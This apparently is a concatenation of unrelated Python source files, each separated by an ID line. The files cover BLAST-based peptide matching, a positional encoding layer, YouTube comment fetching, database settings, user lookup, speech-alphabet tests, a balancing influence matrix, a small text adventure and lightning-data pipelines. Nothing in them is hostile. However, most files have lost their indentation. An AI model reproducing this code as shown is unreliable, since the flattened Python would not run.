records_dict = {x.id.replace('WT.', ''): str(x.seq) for x in filter(lambda x: x.id.startswith('WT.'), records)}
else:
return {}
return records_dict
def extract_n_mer(self, full_peptide, subpeptide_position, mutation_position, mt_length):
#For non-frameshifts this ensures that we only test match_length epitopes that overlap the mutation
#If we extract a larger region, we will get false-positive matches against the reference proteome
#from the native wildtype portion of the peptide
flanking_sequence_length = self.match_length - 1
mt_start = (subpeptide_position-1) + (mutation_position-1)
start = mt_start - flanking_sequence_length
if start < 0:
start = 0
end = mt_start + mt_length + flanking_sequence_length
return full_peptide[start:end]
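    # Worked example (illustrative values): with match_length=8 the flanking
    # length is 7; for subpeptide_position=3, mutation_position=4 and
    # mt_length=1, mt_start = (3-1) + (4-1) = 5, start = max(0, 5-7) = 0 and
    # end = 5 + 1 + 7 = 13, so the returned n-mer is full_peptide[0:13].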
def extract_n_mer_from_fs(self, full_peptide, wt_peptide, epitope, subpeptide_position):
#For frameshifts we want to test all downstream epitopes in the flanking region since they are all potentially novel
flanking_sequence_length = self.match_length - 1
start = subpeptide_position - 1 - flanking_sequence_length
if start < 0:
start = 0
#This catches cases where the start position would cause too many leading wildtype amino acids, which would result
#in false-positive reference matches
if len(full_peptide) > len(wt_peptide):
diff_position = [i for i in range(len(wt_peptide)) if wt_peptide[i] != full_peptide[i]][0]
else:
diff_position = [i for i in range(len(full_peptide)) if wt_peptide[i] != full_peptide[i]][0]
min_start = diff_position - self.match_length + 1
if min_start > start:
start = min_start
end = start + flanking_sequence_length + len(epitope) + flanking_sequence_length
return full_peptide[start:end]
def metric_headers(self):
return ['Chromosome', 'Start', 'Stop', 'Reference', 'Variant', 'Transcript', 'Peptide', 'Hit ID', 'Hit Definition', 'Query Sequence', 'Match Sequence', 'Match Start', 'Match Stop']
def execute(self):
if self.species not in self.species_to_organism:
print("Species {} not supported for Reference Proteome Similarity search. Skipping.".format(self.species))
shutil.copy(self.input_file, self.output_file)
return
mt_records_dict = self.get_mt_peptides()
wt_records_dict = self.get_wt_peptides()
with open(self.input_file) as input_fh, open(self.output_file, 'w') as output_fh, open(self.metric_file, 'w') as metric_fh:
reader = csv.DictReader(input_fh, delimiter="\t")
writer = csv.DictWriter(output_fh, delimiter="\t", fieldnames=reader.fieldnames + self.reference_match_headers(), extrasaction='ignore')
metric_writer = csv.DictWriter(metric_fh, delimiter="\t", fieldnames=self.metric_headers(), extrasaction='ignore')
writer.writeheader()
metric_writer.writeheader()
processed_peptides = []
reference_match_dict = defaultdict(list)
for line in reader:
if self.file_type == 'pVACbind':
epitope = line['Epitope Seq']
peptide = mt_records_dict[line['Mutation']]
else:
epitope = line['MT Epitope Seq']
if self.file_type == 'vcf':
if line['Variant Type'] == 'FS':
peptide = self.extract_n_mer_from_fs(mt_records_dict[line['Index']], wt_records_dict[line['Index']], epitope, int(line['Sub-peptide Position']))
else:
mt_amino_acids = line['Mutation'].split('/')[1]
if mt_amino_acids == '-':
mt_amino_acids = ''
peptide = self.extract_n_mer(mt_records_dict[line['Index']], int(line['Sub-peptide Position']), int(line['Mutation Position']), len(mt_amino_acids))
else:
peptide = mt_records_dict[line['Index']]
if peptide not in processed_peptides:
processed_peptides.append(peptide)
result_handle = NCBIWWW.qblast("blastp", "refseq_protein", peptide, entrez_query="{} [Organism]".format(self.species_to_organism[self.species]), word_size=min(self.match_length, 7), gapcosts='32767 32767')
for blast_record in NCBIXML.parse(result_handle):
if len(blast_record.alignments) > 0:
for alignment in blast_record.alignments:
for hsp in alignment.hsps:
                                    matches = re.split(r'\+| ', hsp.match)
for match in matches:
if len(match) >= self.match_length:
reference_match_dict[peptide].append({
'Hit ID': alignment.hit_id,
'Hit Definition': alignment.hit_def,
'Query Sequence': hsp.query,
'Match Sequence': hsp.match,
'Match Start': hsp.sbjct_start,
'Match Stop': hsp.sbjct_end,
})
sleep(10)
if peptide in reference_match_dict:
line['Reference Match'] = True
metric_line = line.copy()
metric_line['Peptide'] = peptide
for alignment in reference_match_dict[peptide]:
metric_line.update(alignment)
metric_writer.writerow(metric_line)
else:
line['Reference Match'] = False
writer.writerow(line)
|
1696745
|
import math
import torch
import torch.nn as nn
class PositionEncoding(nn.Module):
"""
Add positional information to input tensor.
:Examples:
>>> model = PositionEncoding(d_model=6, max_len=10, dropout=0)
>>> test_input1 = torch.zeros(3, 10, 6)
>>> output1 = model(test_input1)
>>> output1.size()
>>> test_input2 = torch.zeros(5, 3, 9, 6)
>>> output2 = model(test_input2)
>>> output2.size()
"""
def __init__(self, n_filters=128, max_len=500):
"""
:param n_filters: same with input hidden size
:param max_len: maximum sequence length
"""
super(PositionEncoding, self).__init__()
# Compute the positional encodings once in log space.
pe = torch.zeros(max_len, n_filters) # (L, D)
position = torch.arange(0, max_len).float().unsqueeze(1)
div_term = torch.exp(torch.arange(0, n_filters, 2).float() * - (math.log(10000.0) / n_filters))
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
self.register_buffer('pe', pe) # buffer is a tensor, not a variable, (L, D)
def forward(self, x):
"""
:Input: (*, L, D)
:Output: (*, L, D) the same size as input
"""
pe = self.pe.data[:x.size(-2), :] # (#x.size(-2), n_filters)
extra_dim = len(x.size()) - 2
for _ in range(extra_dim):
pe = pe.unsqueeze(0)
x = x + pe
return x
def test_pos_enc():
mdl = PositionEncoding()
batch_size = 8
n_channels = 128
n_items = 60
input = torch.ones(batch_size, n_items, n_channels)
out = mdl(input)
print(out)
if __name__ == '__main__':
test_pos_enc()
|
1696843
|
from utils import youtube_authenticate, get_video_id_by_url, get_channel_id_by_url
def get_comments(youtube, **kwargs):
return youtube.commentThreads().list(
part="snippet",
**kwargs
).execute()
if __name__ == "__main__":
# authenticate to YouTube API
youtube = youtube_authenticate()
# URL can be a channel or a video, to extract comments
url = "https://www.youtube.com/watch?v=jNQXAC9IVRw&ab_channel=jawed"
if "watch" in url:
# that's a video
video_id = get_video_id_by_url(url)
params = {
'videoId': video_id,
'maxResults': 2,
'order': 'relevance', # default is 'time' (newest)
}
else:
# should be a channel
channel_id = get_channel_id_by_url(url)
params = {
'allThreadsRelatedToChannelId': channel_id,
'maxResults': 2,
'order': 'relevance', # default is 'time' (newest)
}
# get the first 2 pages (2 API requests)
n_pages = 2
for i in range(n_pages):
        # make one API call to fetch a page of comments for the given params
response = get_comments(youtube, **params)
items = response.get("items")
# if items is empty, breakout of the loop
if not items:
break
for item in items:
comment = item["snippet"]["topLevelComment"]["snippet"]["textDisplay"]
updated_at = item["snippet"]["topLevelComment"]["snippet"]["updatedAt"]
like_count = item["snippet"]["topLevelComment"]["snippet"]["likeCount"]
comment_id = item["snippet"]["topLevelComment"]["id"]
print(f"""\
Comment: {comment}
Likes: {like_count}
Updated At: {updated_at}
==================================\
""")
if "nextPageToken" in response:
# if there is a next page
# add next page token to the params we pass to the function
params["pageToken"] = response["nextPageToken"]
else:
            # no next page token: reached the end of the comments
break
print("*"*70)
|
1696851
|
from enum import auto
from functools import lru_cache
from typing import Any, Dict, Optional
import sqlalchemy as sa
from pydantic import validator
from fastapi_auth.fastapi_util.settings.base_api_settings import BaseAPISettings
from fastapi_auth.fastapi_util.util.enums import StrEnum
class DatabaseBackend(StrEnum):
postgresql = auto()
sqlite = auto()
@staticmethod
def from_engine(engine: sa.engine.Engine) -> "DatabaseBackend":
return DatabaseBackend(engine.dialect.name)
class DatabaseSettings(BaseAPISettings):
backend: DatabaseBackend = None # type: ignore
user: Optional[str]
password: Optional[str]
host: Optional[str]
db: Optional[str]
sqlalchemy_uri: str = None # type: ignore
log_sqlalchemy_sql_statements: bool = False
min_size: int = 10
max_size: int = 10
force_rollback: bool = False
@validator("sqlalchemy_uri", pre=True, always=True)
def validate_sqlalchemy_uri(cls, v: Optional[str], values: Dict[str, Any]) -> str:
if v is None:
backend = values.get("backend")
backend = backend.value if backend is not None else None
user = values["user"]
password = values["password"]
host = values["host"]
db = values["db"]
v = f"{backend}://{user}:{password}@{host}/{db}"
return v
class Config:
env_prefix = "db_"
@lru_cache()
def get_database_settings() -> DatabaseSettings:
return DatabaseSettings()
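# Illustrative sketch (assumed values): settings are read from the
# environment using the "db_" prefix, so e.g.
#   DB_BACKEND=postgresql DB_USER=app DB_PASSWORD=secret \
#   DB_HOST=localhost DB_DB=mydb
# yields
#   get_database_settings().sqlalchemy_uri
#   == "postgresql://app:secret@localhost/mydb"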
|
1696869
|
logs = {
"img": [
"[INFO] Loading input image: {}",
"[ERROR] On '{}': you need to pass the image path!",
"\te.g. --img='Pictures/notNord.jpg'"
],
"out": [
"[INFO] Set output image name: {}",
"[ERROR] On '{}': no output filename specify!",
"\te.g. --out='Pictures/nord.jpg'"
],
"navg": [
"[INFO] No average pixels selected for algorithm optimization",
"[ERROR] On '{}': the average pixels do not take any values!",
"\te.g. --no-average"
],
"pxls": [
"[INFO] Set up pixels width area: {}",
"[INFO] Set up pixels height area: {}",
"[ERROR] On '{}': no value specify within the area pixels!",
"\te.g. --pixels-area=2 or -pa=-4,-3"
],
"blur": [
"[INFO] Blur enabled",
"[ERROR] On '{}': the blur argument do not take any values!",
"\te.g. --blur"
],
"pals": [
"[INFO] Use all color set: {}",
"[INFO] Use palette set: {}",
"\t {} \u2713",
"\t {} \u2718",
"[WARNING] No theme specified, use default Nord theme",
"[WARNING] No set found for: {} \u2753",
],
"err": [
"[INFO] No image created, solve all ERROR and retry."
]
}
|
1696891
|
import abc
import typing as t
from .protocols import UserLike
class UserProvider(abc.ABC): # pragma: no cover
"""User provides perform user look ups over data storages.
These classes are consumed by Authenticator instances
and are not designed to be a part of login or logout process."""
async def find_by_id(self, identifier: t.Any) -> t.Optional[UserLike]:
"""Look up a user by ID."""
raise NotImplementedError()
async def find_by_username(self, username_or_email: str) -> t.Optional[UserLike]:
"""Look up a user by it's identity. Where identity may be an email address, or username."""
raise NotImplementedError()
async def find_by_token(self, token: str) -> t.Optional[UserLike]:
"""Look up a user using API token."""
raise NotImplementedError()
class InMemoryProvider(UserProvider):
"""A user provides that uses a predefined map of users."""
def __init__(self, user_map: t.Mapping[str, UserLike]) -> None:
self.user_map = user_map
async def find_by_id(self, identifier: str) -> t.Optional[UserLike]:
return self.user_map.get(identifier)
async def find_by_username(self, username_or_email: str) -> t.Optional[UserLike]:
return self.user_map.get(username_or_email)
async def find_by_token(self, token: str) -> t.Optional[UserLike]:
return self.user_map.get(token)
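# Illustrative sketch (assumes `alice` implements UserLike):
#
# import asyncio
# provider = InMemoryProvider({'alice': alice})
# user = asyncio.run(provider.find_by_username('alice'))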
|
1696896
|
from collections import OrderedDict
import pytest
from deepspeech.data.alphabet import Alphabet
SYMBOLS = OrderedDict([(symbol, index) for index, symbol in enumerate('abcd')])
@pytest.fixture
def alphabet():
return Alphabet(SYMBOLS.keys())
def test_duplicate_symbol_raises_valueerror():
with pytest.raises(ValueError):
Alphabet('aa')
def test_len(alphabet):
assert len(alphabet) == len(SYMBOLS)
def test_iterator(alphabet):
exp_symbols = list(SYMBOLS.keys())
for index, symbol in enumerate(alphabet):
assert symbol == exp_symbols[index]
def test_get_symbol(alphabet):
for symbol, index in SYMBOLS.items():
assert alphabet.get_symbol(index) == symbol
def test_get_index(alphabet):
for symbol, index in SYMBOLS.items():
assert alphabet.get_index(symbol) == index
def test_get_symbols(alphabet):
sentence = ['a', 'b', 'b', 'c']
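    # 99 is out of range for the four-symbol alphabet; get_symbols is
    # expected to drop invalid indices, so the output matches `sentence`.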
indices = [0, 1, 1, 99, 2]
actual = alphabet.get_symbols(indices)
assert len(actual) == len(sentence)
assert all([a == e for a, e in zip(actual, sentence)])
def test_get_indices(alphabet):
sentence = ['a', 'b', 'b', 'invalid', 'c']
indices = [0, 1, 1, 2]
actual = alphabet.get_indices(sentence)
assert len(actual) == len(indices)
assert all([a == e for a, e in zip(actual, indices)])
|
1696920
|
import numpy as np
import tools
import warnings
class Alpha():
"""
    Alpha is the influence coefficient matrix.
    The influence coefficient matrix represents the change of the vibration
    vector at a measuring point when a unit weight is placed on a balancing
    plane.
    """
def __init__(self:'Influence matrix', name:'string'=''):
"""
Instantiate an instance of Alpha
name: optional name of Alpha
"""
self.name = name
    def add(self, direct_matrix:'np.array'=None, A:'initial_vibration numpy.array'=None,
B:'trial matrix numpy.array'=None, U:'trial weight row vector numpy.array'=None,
keep_trial:'optional keep the previous trial weight in every succeeding trial'=False,
name:'string'=''):
'''
Method to add new values for Alpha instance
either the direct_matrix is needed or ALL of (A, B, U)
Args:
direct_matrix: numpy array M rows -> measuring points,
N columns -> balancing planes
A: Initial vibration column array -> numpy array
B: Trial matrix MxN array -> numpy array
U: Trial weights row array -> numpy array
        alpha = (B - A) / U
'''
try: # test if direct input
_ = direct_matrix.shape # TODO raise error when matrix is 1 dim
if direct_matrix.shape[0] >= direct_matrix.shape[1]:
self.value = direct_matrix
else:
raise tools.CustomError('Number of rows(measuring points) should be '
'equal or more than the number of columns '
'(balancing planes)!')
except AttributeError:
            # if direct_matrix is not given, calculate alpha from A, B, U
            # test the existence of A, B, U to calculate ALPHA
try:
all([A.shape, B.shape, U.shape])
# Test dimensions
if A.shape[1] > 1:
raise tools.CustomError('`A` should be column vector')
elif U.ndim > 1:
raise tools.CustomError('`U` should be row vector')
elif B.shape[0] != A.shape[0] or B.shape[1] != U.shape[0]:
raise tools.CustomError('`B` dimensions should match `A`and `U`')
else:
if not keep_trial:
self.value = (B - A) / U
else:
_A_keep_trial = np.delete((np.insert(B, [0], A, axis=1)),
-1, axis=1)
self.value = (B - _A_keep_trial) / U
except AttributeError:
raise tools.CustomError('Either direct_matrix or (A,B,U) '
'should be passed "numpy arrays"')
def check(self, ill_condition_remove=False):
        '''
        Method to check the alpha value
        * check the symmetry of the matrix (square matrices only; a square
          influence matrix should be symmetric, obeying the reciprocity law)
        * check for ill-conditioned planes:
          if two or more planes have linearly dependent readings,
          for example [[1, 2, 3], [2, 4, 6]], they are called ill-conditioned
          planes, as they do not carry new information about the system and
          including them degrades the solution.
        ill_condition_remove = True : remove the ill-conditioned planes after the check
        '''
self.M = self.value.shape[0]
self.N = self.value.shape[1]
if self.M == self.N:
_check_sym = np.allclose(self.value, self.value.T, 0.1, 1e-06)
if not _check_sym:
warnings.warn('Warning: Influence Matrix is asymmetrical!')
_check_status_sym = 'Influence Matrix is asymmetrical, check your data'
else:
_check_status_sym = 'Influence Matrix is symmetric --> OK'
else:
_check_status_sym = 'Not a square matrix --> no exact solution'
# Checking ILL-CONDITIONED planes
ill_plane = tools.ill_condition(self.value)
if ill_plane:
            _check_ill_condition = 'Ill condition found in plane {}'.format(ill_plane)
if ill_condition_remove:
self.value = np.delete(self.value,[ill_plane], axis=1)
else:
            _check_ill_condition = 'No ill-conditioned planes --> ok'
return print('{}\n\n{}'.format(_check_status_sym, _check_ill_condition))
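if __name__ == '__main__':
    # Minimal sketch with assumed trial-run values: two measuring points,
    # two balancing planes, alpha computed as (B - A) / U.
    A = np.array([[170.0], [53.0]])               # initial vibration (M x 1)
    B = np.array([[235.0, 185.0], [58.0, 77.0]])  # trial matrix (M x N)
    U = np.array([1.15, 1.15])                    # trial weights (N,)
    alpha = Alpha(name='demo')
    alpha.add(A=A, B=B, U=U)
    print(alpha.value)
    alpha.check()  # reports asymmetry and ill-conditioned planes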
|
1696923
|
class Player:
def __init__(
self,
username: str,
player_class,
):
self.username = username
        self.inventory = Inventory()
self.player_class = player_class
self.skills = None
self.gender = None
self._count = 0
self.directions = {
'start': {
'forest':
                    'You are in a forest, look around... the silence, the trees, you are trying '
                    'to figure out how you came here, how this even happened to you'
', but the only thing you know, is that you are about to start your path'
', please, just follow your lead here, you are alone now.\n\n Type the command: ',
},
'north': [{
'Palace of Nather': {
'Description': 'bla bla bla bla',
'Items': {
'rope': 1,
'gold': 0.2,
'arrows': 1
},
'Options': [],
'Enemies': {}
}
}, {
'<NAME>': {
'Description': 'bla bla bla bla',
'Items': {
'rope': 1,
'gold': 0.2,
'arrows': 1
},
'Options': [],
'Enemies': {
'The big Joint': {
'hp': 300,
'level': 15,
'items': {
'gold': 150
}
}
}
}}
],
'south': {
},
'east': {
},
'west': {
},
}
self.CHAR_CLASSES = {
'WIZARD': {
'HP': 100,
'INTELLIGENCE': 60,
'PHYSICAL': 10,
'SKILLS': 80,
'SPEED': 30,
'HEAVY_WEAPONS': 5
},
'FIGHTER': {
'HP': 100,
'INTELLIGENCE': 10,
'PHYSICAL': 70,
'SKILLS': 30,
'SPEED': 70,
'HEAVY_WEAPONS': 40
},
'ORC': {
'HP': 100,
'INTELLIGENCE': 10,
'PHYSICAL': 90,
'SKILLS': 5,
'SPEED': 20,
'HEAVY_WEAPONS': 90
},
}
self.actual_location = self.directions['start']['forest']
def set_username(self, new_username):
self.username = new_username
    @property
    def show_own_inventory(self):
        # Inventory.show_attributes is itself a property, so no call parentheses
        return self.inventory.show_attributes
def player_class_selection(
self,
char_class_picked: str
):
self.player_class = char_class_picked
def set_skills(self):
name_of_the_char_class = self.player_class
self.skills = self.CHAR_CLASSES[name_of_the_char_class]
def traveling(self, direction):
possible_directions = self.directions.keys()
if direction not in possible_directions:
return 'Not a valid direction'
else:
self._change_location(direction)
    def _change_location(self, direction):
        number_of_places_direction_has = len(self.directions[direction])
        if self._count >= number_of_places_direction_has:
            return 'you should go back'
        # use the current index before advancing it, so the first place
        # in a direction is not skipped
        self.actual_location = self.directions[direction][self._count]
        self._count += 1
@property
def catch_actual_location(self):
return self.actual_location
class Inventory:
def __init__(
self,
rope: int = 0,
leather: int = 0,
meat: int = 0,
gold: int = 0,
arrows: int = 0
):
self.rope = rope
self.leather = leather
self.meat = meat
self.gold = gold
self.arrows = arrows
def add_to_attribute(
self,
attr,
quantity: int = 0
):
if hasattr(self, attr):
sum_of_old_and_new_quantity = self.__getattribute__(attr) + quantity
self.__setattr__(attr, sum_of_old_and_new_quantity)
else:
raise AttributeError
@property
def show_attributes(self):
return (
f'Rope: {self.rope} \n'
f'Leather: {self.leather}\n'
f'Meat: {self.meat}\n'
f'Gold: {self.gold}\n'
f'Arrows: {self.arrows}\n'
)
class Journey:
def __init__(self):
self.player = None
def get_player(self, username, char_class):
self.player = Player(
username=username,
player_class=char_class
)
return self.player
if __name__ == '__main__':
from time import sleep
input_username = input('insert the name of your character: ')
sleep(2)
print(
f'Hello {input_username.capitalize()}, It is now your turn to become '
f'a legend! Please choose your class: \n'
)
setting_player = Journey()
player = setting_player.get_player(
username=input_username,
char_class=None
)
list_of_char_classes = list(setting_player.player.CHAR_CLASSES.keys())
sleep(2)
for char_classes in list_of_char_classes:
print(f'{list_of_char_classes.index(char_classes) + 1} - {char_classes}')
sleep(0.5)
input_class = int(input('Select now your class warrior! The number please: '))
player.player_class = list_of_char_classes[input_class - 1]
player.set_skills()
print(f'\nYou choose the {player.player_class} class, look at your statuses: \n')
for status, value in player.CHAR_CLASSES[list_of_char_classes[input_class - 1]].items():
print(f'{status}: {value}')
sleep(4)
print(
'\nWell done soldier! Now you are able to start the most'
' incredible adventures in the world!'
)
print('LOADING ...')
sleep(4)
    print(
        '\nThis is your first world, prepare to find '
        'tons of kinds of creatures on your way. \n'
        'You may think this is insane, but the truth is: '
        'No one has ever returned from this quest. \n'
        'If you think now is the right time for you to '
        'make something great, this challenge is for you. \n'
    )
print('*'*40 + '\n')
sleep(2)
    print(
        'First you need the instructions, so here is how to play.\n'
        'For every action you may take, questions will be shown on screen;'
        ' choose according to the instructions given there.\n'
        'For instance: \n'
    )
    command = ''
    location = player.catch_actual_location
    print(f'Your actual location is {location}')
    while command != 'exit':
        command = input(' >>> ')
        if command == 'look':
            print(location)
        elif command == 'north':
            player.traveling('north')
            location = player.catch_actual_location
            for title in location.keys():
                print(f'Welcome to {title.upper()}:\n'
                      f'{location[title]}')
|
1696976
|
from __future__ import absolute_import
from __future__ import print_function
import glob
import gc
import numpy as np
from lmatools.stream.subset import coroutine
from lmatools.density_tools import unique_vectors
import logging
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
# --------------------------------------------------------------------------
# ----- This section could be replaced with stormdrain.pipeline imports ----
# --------------------------------------------------------------------------
# class map_projector(object):
# def __init__(self, ctr_lat, ctr_lon, proj_name='eqc'):
# self.mapProj = MapProjection(projection=proj_name, ctrLat=ctr_lat, ctrLon=ctr_lon, lat_ts=ctr_lat, lon_0=ctr_lon)
# self.geoProj = GeographicSystem()
#
# def __call__(self, lon, lat, alt):
# x,y,z = self.mapProj.fromECEF(
# *self.geoProj.toECEF(lon, lat, alt)
# )
# return x, y, z
#
# @coroutine
# def map_projector(ctr_lat, ctr_lon, target, proj_name='eqc'):
# mapProj = MapProjection(projection=proj_name, ctrLat=ctr_lat, ctrLon=ctr_lon, lat_ts=ctr_lat, lon_0=ctr_lon)
# geoProj = GeographicSystem()
# while True:
# lon, lat, alt = (yield)
# x,y,z = self.mapProj.fromECEF(
# *self.geoProj.toECEF(lon, lat, alt)
# )
# target.send((x,y,z))
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
@coroutine
def flash_count_log(logfile, format_string="%s flashes in frame starting at %s"):
""" Write flash count for some frame to a file-like object. File open/close should be handled
by the calling routine."""
# Track flash count for each frame
frame_times = {}
try:
while True:
# Receive list of flashes, frame start time
flashes, frame_start_time = (yield)
n_flashes = len(flashes)
try:
frame_times[frame_start_time] += n_flashes
except KeyError:
                # First flashes seen for this frame; start the count
frame_times[frame_start_time] = n_flashes
except GeneratorExit:
all_times = list(frame_times.keys())
all_times.sort()
for frame_start_time in all_times:
flash_count_status = format_string % (frame_times[frame_start_time], frame_start_time)
if hasattr(logfile, 'write'):
logfile.write(flash_count_status+'\n')
else:
logfile.info(flash_count_status)
@coroutine
def filter_flash(target, min_points=10):
""" Filters flash by minimum number of points.
"""
while True:
evs, flash = (yield) # Receive a flash
        if flash['n_points'] >= min_points:
target.send((evs, flash))
del evs, flash
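# Illustrative wiring (a sketch): the @coroutine decorator primes each stage,
# so stages chain by passing one coroutine as another's 'target'.
#   counter = flash_count_log(some_logfile)           # 'some_logfile' is hypothetical
#   stage = filter_flash(some_target, min_points=10)  # 'some_target' is hypothetical
#   stage.send((events, flash))                       # push one flash through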
def stack_chopped_arrays(chop_sequence):
""" Given a sequence of lists of arrays, return an equal length sequence
where the arrays have been combined by position in the original sequence.
The lists of arrays must each be of the same length. This is useful when
there is a list of arrays corresponding to data subdivided into time
series chunks.
In the example below, each row is data from a different file (letters)
and each column is a different time window in a time series. By stacking
the columns, a combined time series is generated.
([a0, a1, a2, a3],
[b0, b1, b2, b3],
[c0, c1, c2, c3],)
becomes
    [a0+b0+c0, a1+b1+c1, a2+b2+c2, a3+b3+c3]
where plus indicates concatenation
"""
combined = [np.hstack(a) for a in zip(*chop_sequence)]
return combined
class ArrayChopper(object):
""" Initialized with an array of N_+1 edges corresponding to N
windows. The edges are assumed to be sorted.
Methods
window_masks(data, edge_key=None): given an array of data with a named dtype,
return a list of boolean masks that can be used to index data,
giving the subset of data which corresponds to each window.
If an edge_key is provided, it is assumed to reference a named array
and masking is performed on data[edge_key]
chop(data, edge_key=None): Returns a list of arrays where the
masks described above have been applied to chop the data
Generator functions for each of the above are also available
gen_window_masks, gen_chop
"""
def __init__(self, edges):
self.edges = edges
def _apply_edge_key(self, data, edge_key):
if edge_key is not None:
d = data[edge_key]
else:
d = data
return d
def gen_edge_pairs(self):
for l, r in zip(self.edges[:-1], self.edges[1:]):
yield l, r
def window_masks(self, data, edge_key=None):
        masks = [w for w in self.gen_window_masks(data, edge_key)]
return masks
def gen_window_masks(self, data, edge_key=None):
d = self._apply_edge_key(data, edge_key)
for l, r in self.gen_edge_pairs():
# make sure this is only one-side inclusive to eliminate double-counting
within = (d >= l) & (d < r)
yield within
def chop(self, data, edge_key=None):
chopped = [d for d in self.gen_chop(data, edge_key)]
return chopped
def gen_chop(self, data, edge_key=None):
# d = self._apply_edge_key(data, edge_key)
for mask in self.gen_window_masks(data, edge_key):
yield data[mask]
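# Illustrative use of ArrayChopper (a sketch, assuming a named 'time' field):
#   edges = np.asarray([0.0, 1.0, 2.0, 3.0])          # N+1 edges -> N windows
#   data = np.array([(0.5,), (1.5,), (2.5,)], dtype=[('time', 'f4')])
#   ArrayChopper(edges).chop(data, edge_key='time')   # three 1-element arrays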
@coroutine
def flashes_to_frames(time_edges, targets, time_key='start', do_events=False,
time_edges_datetime=None, flash_counter=None):
""" time_edges_datetime is same len as time_edges but with datetime objects
instead of floats.
When paired with extract_events_for_flashes, and events=False, the
flashes are placed in the correct time frame, and any events from that
flash, including those that cross a time boundary, are included.
if do_events='event_time_key', then also subset the events. This
operation is naive, i.e., the events are selected by time with no
attempt to keep events together with their parent flash. Therefore, it
is important to ensure that events and flashes are sent together in
chunks that do not cross time boundaries, which implies pre-aggregating
and time-tagging the event data so that the events and flashes remain
together when naively subset. If those conditions are met then this
option allows one to set up a pipeline without an additional
extract_events_for_flashes step.
"""
if time_edges_datetime is None:
# print "Datetime-style time edges not found, using time edges in seconds for flash count label"
time_edges_datetime = time_edges
flash_count_messages = []
assert len(time_edges) == (len(time_edges_datetime))
assert len(time_edges) == (len(targets)+1)
while True:
events, flashes = (yield)
start_times = flashes[time_key]
sort_idx = np.argsort(start_times) #, order=[time_key])
idx = np.searchsorted(start_times[sort_idx], time_edges)
slices = [slice(*i) for i in zip(idx[0:-1], idx[1:])]
if do_events != False:
ev_start_times = events[do_events]
ev_sort_idx = np.argsort(ev_start_times)
ev_idx = np.searchsorted(ev_start_times[ev_sort_idx], time_edges)
ev_slices = [slice(*i) for i in zip(ev_idx[0:-1], ev_idx[1:])]
else:
ev_slices = range(len(time_edges))
for target, s, ev_s, frame_start_time in zip(targets,
slices, ev_slices, time_edges_datetime[:-1]):
these_flashes = flashes[sort_idx][s]
if do_events != False:
these_events = events[ev_sort_idx][ev_s]
else:
these_events = events
if flash_counter is not None:
flash_counter.send((these_flashes, frame_start_time))
# flash_count_status = "Sending %s flashes to frame starting at %s" % (len(these_flashes), frame_start_time)
# flash_count_messages += flash_count_status
# print flash_count_status
target.send((these_events, these_flashes))
del events, flashes, start_times, sort_idx, idx, slices
log.info(flash_count_messages)
def event_yielder(evs, fls):
for fl in fls:
these_events = evs[evs['flash_id'] == fl['flash_id']]
# if len(these_events) <> fl['n_points']:
# print 'not giving all ', fl['n_points'], ' events? ', these_events.shape
for an_ev in these_events:
yield an_ev
@coroutine
def extract_events_for_flashes(target, flashID_key='flash_id'):
""" Takes a large table of events and grabs only the events belonging to the flashes.
"""
while True:
evs, fls = (yield)
# print 'extracting events'
# event_dtype = evs[0].dtype
event_dtype = evs.dtype
        events = np.fromiter(event_yielder(evs, fls), dtype=event_dtype)
        # The commented fromiter below does the same thing as the 'mapper'
        # approach that follows it, but is ~10x slower.
        # events = np.fromiter((evs[evs['flash_id'] == fl['flash_id']] for fl in fls), dtype=event_dtype)
        # The 'mapper' could be optimized further by calculating it globally,
        # once per events table, but this is fast enough and saves passing
        # through another variable.
        # mapper = dict(zip(evs['flash_id'],evs))
        # events = np.fromiter( (mapper[fl['flash_id']] for fl in fls), dtype=event_dtype)
target.send((events, fls))
del events, evs, fls
# @coroutine
# def extract_events(target, flashID_key='flash_id'):
# """ Takes a large table of events and grabs only the events belonging to the flash.
# This is useful if you filter out a bunch of flashes before going to the trouble of
# reading the flashes in.
# """
# while True:
# evs, flash = (yield)
# flash_id = flash[flashID_key]
# event_dtype = evs[0].dtype
# # events = [ev[:] for ev in evs if ev[flashID_key] == flash_id]
# # events = np.asarray(events, dtype=event_dtype)
# # events = evs[:]
# events = evs[evs[flashID_key]==flash_id]
# # events = np.fromiter((ev[:] for ev in evs if ev[flashID_key] == flash_id), dtype=event_dtype)
# target.send((events, flash))
@coroutine
def no_projection(x_coord, y_coord, z_coord, target, use_flashes=False):
while True:
events, flashes = (yield)
        if use_flashes:
points = flashes
else:
points = events
x,y,z = points[x_coord], points[y_coord], points[z_coord]
target.send((events, flashes, x,y,z))
del events, flashes, x,y,z, points
@coroutine
def project(x_coord, y_coord, z_coord, mapProj, geoProj, target,
use_flashes=False, transform=True):
""" Adds projected coordinates to the flash and events stream"""
while True:
events, flashes = (yield)
        if use_flashes:
points = flashes
else:
points = events
if transform:
x,y,z = mapProj.fromECEF(*geoProj.toECEF(
points[x_coord], points[y_coord], points[z_coord]))
else:
x,y,z = points[x_coord], points[y_coord], points[z_coord]
target.send((events, flashes, np.atleast_1d(x),
np.atleast_1d(y), np.atleast_1d(z)))
del events, flashes, x,y,z, points
@coroutine
def footprint_mean(x0, y0, dx, dy, target, flash_id_key='flash_id', area_key='area'):
    """ Takes x, y, z flash locations and gets
        extent density unique pixels, averaged over all flashes.
        x0, y0, dx, dy define the regular grid, as in extent_density.
    """
while True:
events, flash, x,y,z = (yield)
# print 'Doing extent density',
x_i = np.floor( (x-x0)/dx ).astype('int32')
y_i = np.floor( (y-y0)/dy ).astype('int32')
if len(x_i) > 0:
footprints = dict(list(zip(flash[flash_id_key], flash[area_key])))
# print 'with points numbering', len(x_i)
unq_idx = unique_vectors(x_i, y_i, events['flash_id'])
# if x[unq_idx].shape[0] > 1:
fl_id = events['flash_id'][unq_idx]
areas = [footprints[fi] for fi in fl_id] #puts areas in same order as x[unq_idx], y[unq_idx]
# counts normalized by areas
target.send((x[unq_idx],y[unq_idx],areas))
del footprints, unq_idx, fl_id, areas
# else:
# print ''
del events, flash, x, y, z, x_i, y_i
@coroutine
def footprint_mean_3d(x0, y0, z0, dx, dy, dz, target, flash_id_key='flash_id', area_key='area'):
    """ Takes x, y, z flash locations and gets
        extent density unique pixels, averaged over all flashes.
        x0, y0, z0, dx, dy, dz define the regular grid, as in extent_density_3d.
    """
while True:
events, flash, x,y,z = (yield)
# print 'Doing extent density',
